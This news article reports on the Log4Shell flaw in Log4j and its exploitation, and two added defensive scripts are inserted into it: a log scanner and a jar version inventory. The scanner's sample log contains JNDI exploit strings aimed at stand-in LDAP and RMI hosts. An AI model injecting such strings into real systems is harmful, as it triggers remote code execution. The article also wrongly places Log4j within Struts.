Critical ‘Log4Shell’ RCE zero-day exploited in large numbers

A simple-to-use exploit that enables remote code execution and full control over millions of vulnerable business systems via a Java logging library is currently being abused in large numbers, researchers warn.

The bug is found in the Apache Foundation’s open source Struts Log4J logging utility, version 2.14 and earlier.

It is caused by the Java Naming and Directory Interface (JNDI) application programming interface not protecting against lookups to endpoints controlled by attackers, including those using the Lightweight Directory Access Protocol (LDAP).

When a vulnerable application writes a log entry, Log4j’s default settings cause the library to look up the server named in the logged string; if that server is controlled by an attacker, it can be configured to return a malicious response.

The response can contain a remote Java class file that is injected into the server process and runs with the same privileges as the vulnerable application that uses the logging library.
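Because the trigger is a lookup string inside a logged message, the first thing most defenders want is a way to find those strings in the logs they already collect. The following scanner is an added example, not code from the article or from the Log4j project: it matches the `${jndi:<scheme>://host[:port]...}` pattern the article describes, case-insensitively, and reports the scheme, host and port of each lookup so the callback endpoints can be blocked or investigated. The log lines and the 203.0.113.10 / example.invalid endpoints are constructed sample data.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# A JNDI lookup embedded in logged text, e.g. ${jndi:ldap://203.0.113.10:1389/a}.
# Log4j matches the lookup prefix case-insensitively, so the scanner does too.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*"
    r"(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


@dataclass
class Finding:
    line_no: int          # 1-based line number in the scanned text
    scheme: str           # lookup scheme, lower-cased (ldap, ldaps, rmi, dns, ...)
    host: str             # callback host the application would contact
    port: Optional[int]   # explicit port, if one was given
    raw: str              # the matched lookup text, for the incident record


def scan_line(line: str, line_no: int = 0) -> List[Finding]:
    """Return one Finding per JNDI lookup found in a single log line."""
    findings = []
    for m in JNDI_LOOKUP.finditer(line):
        port = int(m.group("port")) if m.group("port") else None
        findings.append(
            Finding(line_no, m.group("scheme").lower(), m.group("host"), port, m.group(0))
        )
    return findings


def scan_log(text: str) -> List[Finding]:
    """Scan a block of log text and return every JNDI lookup it contains."""
    results = []
    for n, line in enumerate(text.splitlines(), start=1):
        results.extend(scan_line(line, n))
    return results


def callback_hosts(findings: List[Finding]) -> List[str]:
    """Distinct callback hosts, in first-seen order, for blocklisting or hunting."""
    seen = []
    for f in findings:
        if f.host not in seen:
            seen.append(f.host)
    return seen


# Constructed sample web-server access log: two hostile User-Agent values,
# one benign request, and one benign line containing a non-JNDI lookup.
SAMPLE_LOG = "\n".join([
    '198.51.100.7 - - [10/Dec/2021:08:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:08:12:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:08:12:04 +0000] "GET /login HTTP/1.1" 302 0 "-" "${JNDI:rmi://example.invalid/x}"',
    'app: user ${env:HOME} requested report',
])

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme}://{f.host}" + (f":{f.port}" if f.port else ""))
    print("callback hosts:", callback_hosts(scan_log(SAMPLE_LOG)))
```

Run it against a real log by replacing `SAMPLE_LOG` with the file contents; the `raw` field preserves the exact string for the ticket, and `callback_hosts` gives the egress destinations to check against firewall and DNS logs.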

A proof of concept was posted on Twitter and GitHub, and the vulnerability is rated the maximum 10 out of 10 on the Common Vulnerability Scoring System (CVSS).

Computer Emergency Response Teams around the world are now reporting active exploitation of the flaw by automated systems.

Researchers have so far confirmed that Apple’s iCloud service, Valve’s Steam gaming platform, and Microsoft’s popular Minecraft game are all vulnerable to the bug, which is called Log4Shell.

In Minecraft, testers have reported being able to trigger the flaw by pasting the exploit string into a chat window.

The Apache Foundation has released log4j version 2.15.0, which is not vulnerable to Log4Shell by default.

Administrators running earlier versions of Log4j can also disable the message lookups that trigger the arbitrary code execution flaw.
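Knowing whether you are on 2.15.0 or on one of the earlier versions the article describes as vulnerable is the first remediation step, and in a large estate that means finding every bundled copy of the library. The inventory script below is an added example, not part of the article or of the Log4j project: it walks a directory tree, parses `log4j-core-<version>.jar` file names, and flags any 2.x release below 2.15.0 as vulnerable by default, which is exactly the boundary the article states. The directory tree it builds with empty placeholder files is constructed sample data.

```python
import os
import re
import tempfile
from typing import List, Optional, Tuple

# Matches the core library's jar name, e.g. log4j-core-2.14.1.jar (log4j-api is not the vulnerable part).
JAR_NAME = re.compile(r"^log4j-core-(\d+)\.(\d+)(?:\.(\d+))?\.jar$")

# First release the article reports as not vulnerable to Log4Shell by default.
FIXED_VERSION = (2, 15, 0)

Version = Tuple[int, int, int]


def parse_version(filename: str) -> Optional[Version]:
    """Extract (major, minor, patch) from a log4j-core jar name, or None if it is not one."""
    m = JAR_NAME.match(filename)
    if not m:
        return None
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return (int(major), int(minor), int(patch))


def is_vulnerable_by_default(version: Version) -> bool:
    """True for the 2.x releases the article says are vulnerable (2.14 and earlier)."""
    return version[0] == 2 and version < FIXED_VERSION


def find_log4j_jars(root: str) -> List[Tuple[str, Version, bool]]:
    """Return (path, version, vulnerable) for every log4j-core jar under root."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            version = parse_version(name)
            if version is not None:
                results.append((os.path.join(dirpath, name), version, is_vulnerable_by_default(version)))
    return sorted(results)


def build_sample_tree() -> str:
    """Constructed sample: empty files standing in for real jars in a few deployments."""
    root = tempfile.mkdtemp(prefix="log4j-inventory-")
    for rel in [
        "app1/lib/log4j-core-2.14.1.jar",          # vulnerable by default
        "app2/WEB-INF/lib/log4j-core-2.15.0.jar",  # fixed release
        "app3/lib/log4j-api-2.14.1.jar",           # API jar only, not inventoried
        "legacy/log4j-core-2.3.jar",               # old 2.x, also vulnerable by default
    ]:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "wb").close()
    return root


if __name__ == "__main__":
    for path, version, vulnerable in find_log4j_jars(build_sample_tree()):
        status = "VULNERABLE (upgrade to 2.15.0 or disable message lookups)" if vulnerable else "ok"
        print(f"{'.'.join(map(str, version)):>8}  {status}  {path}")
```

File names are only a first pass: fat jars and shaded builds embed log4j-core under other names, so confirm a hit by checking the `META-INF/MANIFEST.MF` inside the archive. For instances that cannot be upgraded immediately, the lookup-disabling mitigation the article mentions is the `log4j2.formatMsgNoLookups=true` JVM system property, which applies to Log4j 2.10 and later; verify it on each running JVM rather than assuming the deployment script set it.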

Chen Zhaojun from Alibaba’s cloud security team is credited with finding the bug.
